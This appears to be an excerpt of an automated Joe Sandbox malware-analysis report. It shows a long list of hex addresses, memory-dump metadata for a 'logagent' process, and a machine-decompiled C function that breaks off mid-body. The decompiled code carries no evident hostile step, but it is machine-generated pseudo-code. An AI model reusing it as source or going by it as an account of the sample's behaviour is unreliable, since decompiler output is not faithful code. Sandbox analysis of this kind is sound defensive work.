                                              0x051bfadf
                                              0x051bfae2
                                              0x051bfae4
                                              0x051bfae7
                                              0x051bfaea
                                              0x051bfaed
                                              0x05215dc4
                                              0x05215dc9
                                              0x00000000
                                              0x00000000
                                              0x05215dcf
                                              0x051bfaf6
                                              0x051bfafa
                                              0x051bfafc
                                              0x051bfafc
                                              0x051bfafe
                                              0x051bfb01
                                              0x051bfb09
                                              0x051bfb0c
                                              0x051bfb12
                                              0x051bfb14
                                              0x051bfb17
                                              0x05215dd6
                                              0x05215dd9
                                              0x05215dde
                                              0x00000000
                                              0x00000000
                                              0x05215de4
                                              0x05215de7
                                              0x051bfb29
                                              0x051bfb2c
                                              0x05215df3
                                              0x05215df6
                                              0x05215e06
                                              0x05215e0c
                                              0x05215e0f
                                              0x05215e11
                                              0x00000000
                                              0x05215e1f
                                              0x00000000
                                              0x05215e1f
                                              0x05215e11
                                              0x05215df8
                                              0x05215dfb
                                              0x05215e00
                                              0x00000000
                                              0x00000000
                                              0x05215e02
                                              0x00000000
                                              0x05215e02
                                              0x051bfb32
                                              0x051bfb35
                                              0x051bfb3c
                                              0x05215e26
                                              0x05215e28
                                              0x05215e28
                                              0x05215e2e
                                              0x05215e3c
                                              0x05215e3c
                                              0x05215e2e
                                              0x051bfb45
                                              0x051bfb47
                                              0x051bfb53
                                              0x051bfb56
                                              0x051bfb59
                                              0x051bfb5c
                                              0x051bfb65
                                              0x051c000d
                                              0x00000000
                                              0x051c000f
                                              0x051c000f
                                              0x00000000
                                              0x051c000f
                                              0x051bfb6b
                                              0x051bfb6e
                                              0x051bfb71
                                              0x051bfb73
                                              0x051bfb76
                                              0x05215e45
                                              0x05215e4b
                                              0x05215e4b
                                              0x05215e45
                                              0x051bfb80
                                              0x051bfb83
                                              0x05215e54
                                              0x05215e5a
                                              0x05215e5a
                                              0x05215e54
                                              0x051bfb89
                                              0x051bfb98
                                              0x051bfb9b
                                              0x051bfb9e
                                              0x051bfba0
                                              0x05215e63
                                              0x05215e69
                                              0x05215e69
                                              0x05215e63
                                              0x051bfba8
                                              0x00000000
                                              0x051bfbae
                                              0x051bfbb2
                                              0x05215e70
                                              0x051bfbb8
                                              0x051bfbb8
                                              0x051bfbb8
                                              0x051bfbbd
                                              0x051bfbbf
                                              0x051bfbbf
                                              0x051bf9a8
                                              0x051bf9a8
                                              0x051bf9ad
                                              0x051bf9b4
                                              0x05215eda
                                              0x00000000
                                              0x00000000
                                              0x05215ee2
                                              0x051bf9bc
                                              0x051bf9bc
                                              0x051bf9bf
                                              0x051bf9c4
                                              0x051bfde6
                                              0x051bfde9
                                              0x051bfdec
                                              0x051bfdef
                                              0x051bfdf2
                                              0x05215eeb
                                              0x05215ef1
                                              0x05215ef1
                                              0x05215eeb
                                              0x051bfdfa
                                              0x00000000
                                              0x051bfe00
                                              0x051bfe04
                                              0x05215efa
                                              0x05215f00
                                              0x05215f00
                                              0x05215efa
                                              0x051bfe0a
                                              0x051bfa24
                                              0x051bfa2a
                                              0x051bfa2a
                                              0x051bfdfa
                                              0x051bf9cd
                                              0x00000000
                                              0x051bf9cf
                                              0x051bf9cf
                                              0x051bf9d1
                                              0x051bf9d4
                                              0x051bf9d7
                                              0x051bf9d9
                                              0x051bf9dc
                                              0x051bf9df
                                              0x051bf9e2
                                              0x051bf9e7
                                              0x05215f09
                                              0x00000000
                                              0x00000000
                                              0x05215f11
                                              0x051bf9ef
                                              0x051bf9f3
                                              0x051bfed5
                                              0x051bfed8
                                              0x051bfedb
                                              0x05215f1a
                                              0x05215f20
                                              0x05215f20
                                              0x05215f1a
                                              0x051bfee3
                                              0x00000000
                                              0x051bfee9
                                              0x051bfeeb
                                              0x05215f29
                                              0x05215f2f
                                              0x05215f2f
                                              0x05215f29
                                              0x051bfef3
                                              0x00000000
                                              0x051bfef9
                                              0x051bfefc
                                              0x051bff01
                                              0x05215f38
                                              0x051c0052
                                              0x051c0054
                                              0x00000000
                                              0x051c0056
                                              0x051c0056
                                              0x051bff40
                                              0x051bff42
                                              0x05215f6e
                                              0x05215f74
                                              0x05215f74
                                              0x05215f6e
                                              0x051bff50
                                              0x051bff56
                                              0x051bff5b
                                              0x05215f7d
                                              0x00000000
                                              0x00000000
                                              0x05215f83
                                              0x00000000
                                              0x051bff61
                                              0x051bff61
                                              0x051bff63
                                              0x051c0021
                                              0x051c0026
                                              0x051c002b
                                              0x051c007e
                                              0x051c0080
                                              0x051c0080
                                              0x051c007e
                                              0x051c002f
                                              0x00000000
                                              0x051c0031
                                              0x051c0033
                                              0x051c0086
                                              0x051c0035
                                              0x051c0035
                                              0x051c0035
                                              0x051c003c
                                              0x00000000
                                              0x051c003c
                                              0x051c002f
                                              0x051bff69
                                              0x051bff6b
                                              0x05215f8c
                                              0x05215f92
                                              0x05215f92
                                              0x05215f8c
                                              0x051bff74
                                              0x051bff77
                                              0x051bff7b
                                              0x05215f99
                                              0x05215f9b
                                              0x051bff81
                                              0x051bff81
                                              0x051bff83
                                              0x051bff83
                                              0x051bff88
                                              0x051bff8b
                                              0x051bff90
                                              0x051bff92
                                              0x051bff92
                                              0x051bff9c
                                              0x051bffa2
                                              0x051bffa6
                                              0x051bffaa
                                              0x051bffad
                                              0x051bffb2
                                              0x05215fa4
                                              0x05215faa
                                              0x05215faa
                                              0x05215fa4
                                              0x051bffb8
                                              0x00000000
                                              0x051bffb8
                                              0x051bff5b
                                              0x051c0054
                                              0x05215f3e
                                              0x05215f3e
                                              0x051bff09
                                              0x00000000
                                              0x00000000
                                              0x051bff0f
                                              0x051bff14
                                              0x05215f47
                                              0x05215f4d
                                              0x05215f4d
                                              0x05215f47
                                              0x051bff1c
                                              0x051c0046
                                              0x051c0076
                                              0x051c0078
                                              0x00000000
                                              0x051c0048
                                              0x051c0048
                                              0x051c004a
                                              0x051c004a
                                              0x00000000
                                              0x051c004a
                                              0x051bff22
                                              0x051bff22
                                              0x051bff26
                                              0x05215f56
                                              0x05215f5c
                                              0x05215f5c
                                              0x05215f56
                                              0x051bff2e
                                              0x00000000
                                              0x051bff34
                                              0x051bff36
                                              0x05215f65
                                              0x051bff3c
                                              0x051bff3c
                                              0x051bff3c
                                              0x051bff3e
                                              0x00000000
                                              0x051bff3e
                                              0x051bff2e
                                              0x051bff1c
                                              0x051bfef3
                                              0x051bfee3
                                              0x051bf9f9
                                              0x051bf9f9
                                              0x051bf9fb
                                              0x051bf9ff
                                              0x051bfbd5
                                              0x05215fb1
                                              0x05215fb1
                                              0x051bfbdf
                                              0x00000000
                                              0x051bfbe5
                                              0x051bfbe5
                                              0x051bfbe8
                                              0x051bfbed
                                              0x05215fdf
                                              0x051bfc01
                                              0x051bfc01
                                              0x051bfc04
                                              0x051bfc09
                                              0x05215fee
                                              0x05215ff4
                                              0x05215ff4
                                              0x05215fee
                                              0x051bfc0f
                                              0x051bfc13
                                              0x051bfc1d
                                              0x051bfc20
                                              0x051bfc23
                                              0x051bfc26
                                              0x051bfc2b
                                              0x05215ffd
                                              0x05216003
                                              0x05216003
                                              0x05215ffd
                                              0x051bfc33
                                              0x00000000
                                              0x051bfc39
                                              0x051bfc3b
                                              0x051bfc3e
                                              0x051bfc41
                                              0x051bfc46
                                              0x0521600c
                                              0x05216012
                                              0x05216012
                                              0x0521600c
                                              0x051bfc4e
                                              0x00000000
                                              0x051bfc54
                                              0x051bfc54
                                              0x051bfc59
                                              0x0521601b
                                              0x05216021
                                              0x05216021
                                              0x0521601b
                                              0x051bfc61
                                              0x00000000
                                              0x051bfc67
                                              0x051bfc6a
                                              0x051bfc6f
                                              0x0521602a
                                              0x05216030
                                              0x05216030
                                              0x0521602a
                                              0x051bfc77
                                              0x00000000
                                              0x051bfc7d
                                              0x051bfc7f
                                              0x051bfc81
                                              0x051bfc85
                                              0x051bfc87
                                              0x051bfc87
                                              0x051bfc8c
                                              0x051bfc8f
                                              0x051bfc94
                                              0x05216039
                                              0x051bfc9c
                                              0x051bfca4
                                              0x051bfcaa
                                              0x051bfcaf
                                              0x05216046
                                              0x051bfcbd
                                              0x051bfcbf
                                              0x0521606d
                                              0x05216073
                                              0x05216073
                                              0x0521606d
                                              0x051bfcc8
                                              0x051bfccd
                                              0x051bfccf
                                              0x051bfcd3
                                              0x051bfcd5
                                              0x051bfcd5
                                              0x051bfcde
                                              0x051bfce1
                                              0x051bfce3
                                              0x051bfce3
                                              0x051bfce8
                                              0x051bfcf0
                                              0x051bfcf2
                                              0x051bfcf5
                                              0x051bfcf7
                                              0x051bfcff
                                              0x051bfd02
                                              0x051bfd06
                                              0x051bfd11
                                              0x051bfd14
                                              0x051bfd17
                                              0x0521607c
                                              0x05216082
                                              0x05216082
                                              0x0521607c
                                              0x051bfd1f
                                              0x00000000
                                              0x051bfd25
                                              0x051bfd28
                                              0x051bfd2d
                                              0x0521608b
                                              0x05216091
                                              0x05216091
                                              0x0521608b
                                              0x051bfd35
                                              0x00000000
                                              0x051bfd3b
                                              0x051bfd3e
                                              0x051bfd43
                                              0x0521609a
                                              0x051c0016
                                              0x051c0018
                                              0x00000000
                                              0x051c001a
                                              0x051c001a
                                              0x051bfd82
                                              0x051bfd84
                                              0x052160d9
                                              0x052160df
                                              0x052160df
                                              0x052160d9
                                              0x051bfd8d
                                              0x051bfd95
                                              0x051bfd98
                                              0x051bfd9d
                                              0x052160e8
                                              0x00000000
                                              0x00000000
                                              0x052160ee
                                              0x00000000
                                              0x051bfda3
                                              0x051bfda3
                                              0x051bfda5
                                              0x051bfe8b
                                              0x051bfe90
                                              0x051bfe95
                                              0x052160f7
                                              0x052160fd
                                              0x052160fd
                                              0x052160f7
                                              0x051bfe9d
                                              0x00000000
                                              0x051bfea3
                                              0x051bfea5
                                              0x05216106
                                              0x051bfeab
                                              0x051bfeab
                                              0x051bfeab
                                              0x051bfeb2
                                              0x051bfeb5
                                              0x00000000
                                              0x051bfeb5
                                              0x051bfe9d
                                              0x051bfdab
                                              0x051bfdad
                                              0x0521610f
                                              0x05216115
                                              0x05216115
                                              0x0521610f
                                              0x051bfdb6
                                              0x051bfdbb
                                              0x0521611e
                                              0x05216120
                                              0x051bfdc1
                                              0x051bfdc1
                                              0x051bfdc5
                                              0x051bfdc5
                                              0x051bfdc7
                                              0x051bfdcc
                                              0x051bfdce
                                              0x051bfdce
                                              0x051bfdd6
                                              0x051bfdd8
                                              0x00000000
                                              0x051bfdd8
                                              0x051bfd9d
                                              0x051c0018
                                              0x052160a0
                                              0x052160a0
                                              0x051bfd4b
                                              0x00000000
                                              0x00000000
                                              0x051bfd51
                                              0x051bfd56
                                              0x052160a9
                                              0x052160af
                                              0x052160af
                                              0x052160a9
                                              0x051bfd5e
                                              0x051bfebf
                                              0x052160b8
                                              0x051bfec5
                                              0x051bfec5
                                              0x051bfec5
                                              0x051bfec7
                                              0x00000000
                                              0x051bfd64
                                              0x051bfd64
                                              0x051bfd68
                                              0x052160c1
                                              0x052160c7
                                              0x052160c7
                                              0x052160c1
                                              0x051bfd70
                                              0x00000000
                                              0x051bfd76
                                              0x051bfd78
                                              0x052160d0
                                              0x051bfd7e
                                              0x051bfd7e
                                              0x051bfd7e
                                              0x051bfd80
                                              0x00000000
                                              0x051bfd80
                                              0x051bfd70
                                              0x051bfd5e
                                              0x051bfd35
                                              0x051bfd1f
                                              0x0521604c
                                              0x0521604c
                                              0x051bfcb7
                                              0x051bffc0
                                              0x051bffc3
                                              0x051bffc6
                                              0x051bffcb
                                              0x05216055
                                              0x0521605b
                                              0x0521605b
                                              0x05216055
                                              0x051bffd3
                                              0x00000000
                                              0x051bffd9
                                              0x051bffdb
                                              0x05216064
                                              0x051bffe1
                                              0x051bffe1
                                              0x051bffe1
                                              0x051bffe3
                                              0x051bffe7
                                              0x051bffed
                                              0x00000000
                                              0x051bffed
                                              0x051bffd3
                                              0x00000000
                                              0x051bfcb7
                                              0x0521603f
                                              0x051bfc9a
                                              0x00000000
                                              0x051bfc9a
                                              0x051bfc77
                                              0x051bfc61
                                              0x051bfc4e
                                              0x051bfc33
                                              0x05215fe5
                                              0x05215fe5
                                              0x051bfbf5
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051bfbf5
                                              0x051bfbdf
                                              0x051bfa05
                                              0x051bfa05
                                              0x051bfa0a
                                              0x051bfe14
                                              0x05215fb8
                                              0x05215fb8
                                              0x051bfe1e
                                              0x00000000
                                              0x051bfe24
                                              0x00000000
                                              0x051bfe24
                                              0x051bfe1e
                                              0x051bfa10
                                              0x051bfa10
                                              0x051bfa15
                                              0x051bfe29
                                              0x051bfe2d
                                              0x051bfe35
                                              0x051bfe38
                                              0x051bfe3b
                                              0x05215fc1
                                              0x00000000
                                              0x00000000
                                              0x05215fc7
                                              0x051bfe43
                                              0x051bfe45
                                              0x00000000
                                              0x00000000
                                              0x051bfe4b
                                              0x051bfe50
                                              0x05215fd0
                                              0x05215fd6
                                              0x05215fd6
                                              0x05215fd0
                                              0x051bfe5d
                                              0x051bfe60
                                              0x00000000
                                              0x051bfe60
                                              0x051bfe41
                                              0x051bfe41
                                              0x00000000
                                              0x051bfa1b
                                              0x051bfa1b
                                              0x051bfa1d
                                              0x051bfa20
                                              0x00000000
                                              0x051bfa20
                                              0x051bfa15
                                              0x051bf9ed
                                              0x051bf9ed
                                              0x00000000
                                              0x051bf9ed
                                              0x051bf9cd
                                              0x051bf9ba
                                              0x051bf9ba
                                              0x00000000
                                              0x051bf9ba
                                              0x051bfba8
                                              0x051bfb65
                                              0x051bfb1d
                                              0x051bfb23
                                              0x051bfb26
                                              0x00000000
                                              0x051bfb26
                                              0x051bfaf3
                                              0x051bfaf3
                                              0x00000000
                                              0x051bfaf3
                                              0x051bfab4
                                              0x051bfa79
                                              0x051bfa56
                                              0x051bfa56
                                              0x00000000
                                              0x051bfa56
                                              0x051bf94d
                                              0x051bf950
                                              0x051bf955
                                              0x05215e79
                                              0x05215e7f
                                              0x05215e7f
                                              0x05215e79
                                              0x051bf95b
                                              0x051bf960
                                              0x05215e88
                                              0x05215e8a
                                              0x05215e8a
                                              0x05215e8e
                                              0x05215e93
                                              0x00000000
                                              0x05215e99
                                              0x05215e9c
                                              0x05215e9f
                                              0x05215ea1
                                              0x05215ea3
                                              0x05215ea3
                                              0x05215ea7
                                              0x00000000
                                              0x05215ea7
                                              0x051bf966
                                              0x051bf966
                                              0x051bf96b
                                              0x05215eb0
                                              0x05215eb6
                                              0x05215eb6
                                              0x05215eb0
                                              0x051bf973
                                              0x051bfbc7
                                              0x051bf9a5
                                              0x051bf9a5
                                              0x00000000
                                              0x051bf979
                                              0x051bf97d
                                              0x051bf97f
                                              0x05215ebf
                                              0x05215ec5
                                              0x05215ec5
                                              0x05215ebf
                                              0x051bf987
                                              0x00000000
                                              0x051bf98d
                                              0x051bf98d
                                              0x051bf990
                                              0x051bf994
                                              0x051bf997
                                              0x051bf99f
                                              0x051bfff7
                                              0x051c0061
                                              0x051c0064
                                              0x051c006a
                                              0x05215ece
                                              0x05215ed0
                                              0x05215ed0
                                              0x00000000
                                              0x051c0064
                                              0x051bfffd
                                              0x051c0000
                                              0x00000000
                                              0x051c0006
                                              0x05215ecc
                                              0x00000000
                                              0x05215ecc
                                              0x051c0000
                                              0x00000000
                                              0x051bf99f
                                              0x051bf987
                                              0x051bf973

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
                                              • Instruction ID: da73c155cbf19f79835e626e6899f58c408c2710e9e33a9d21fa7b106e1d9c36
                                              • Opcode Fuzzy Hash: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
                                              • Instruction Fuzzy Hash: 56620836E146569BEB35CE28C8407FAFBB2BF55750F1A859CCC59DB242E3B1D8428780
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05285BA5 Relevance: .6, Instructions: 592COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 88%
                                              			E05285BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x5291178);
				E0520D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E05284C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E051FD000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E05285542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x52a60e8;
								if( *0x52a60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x52a60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E051F9710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E051F6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E051FF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E051FF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E051FF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E051FFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
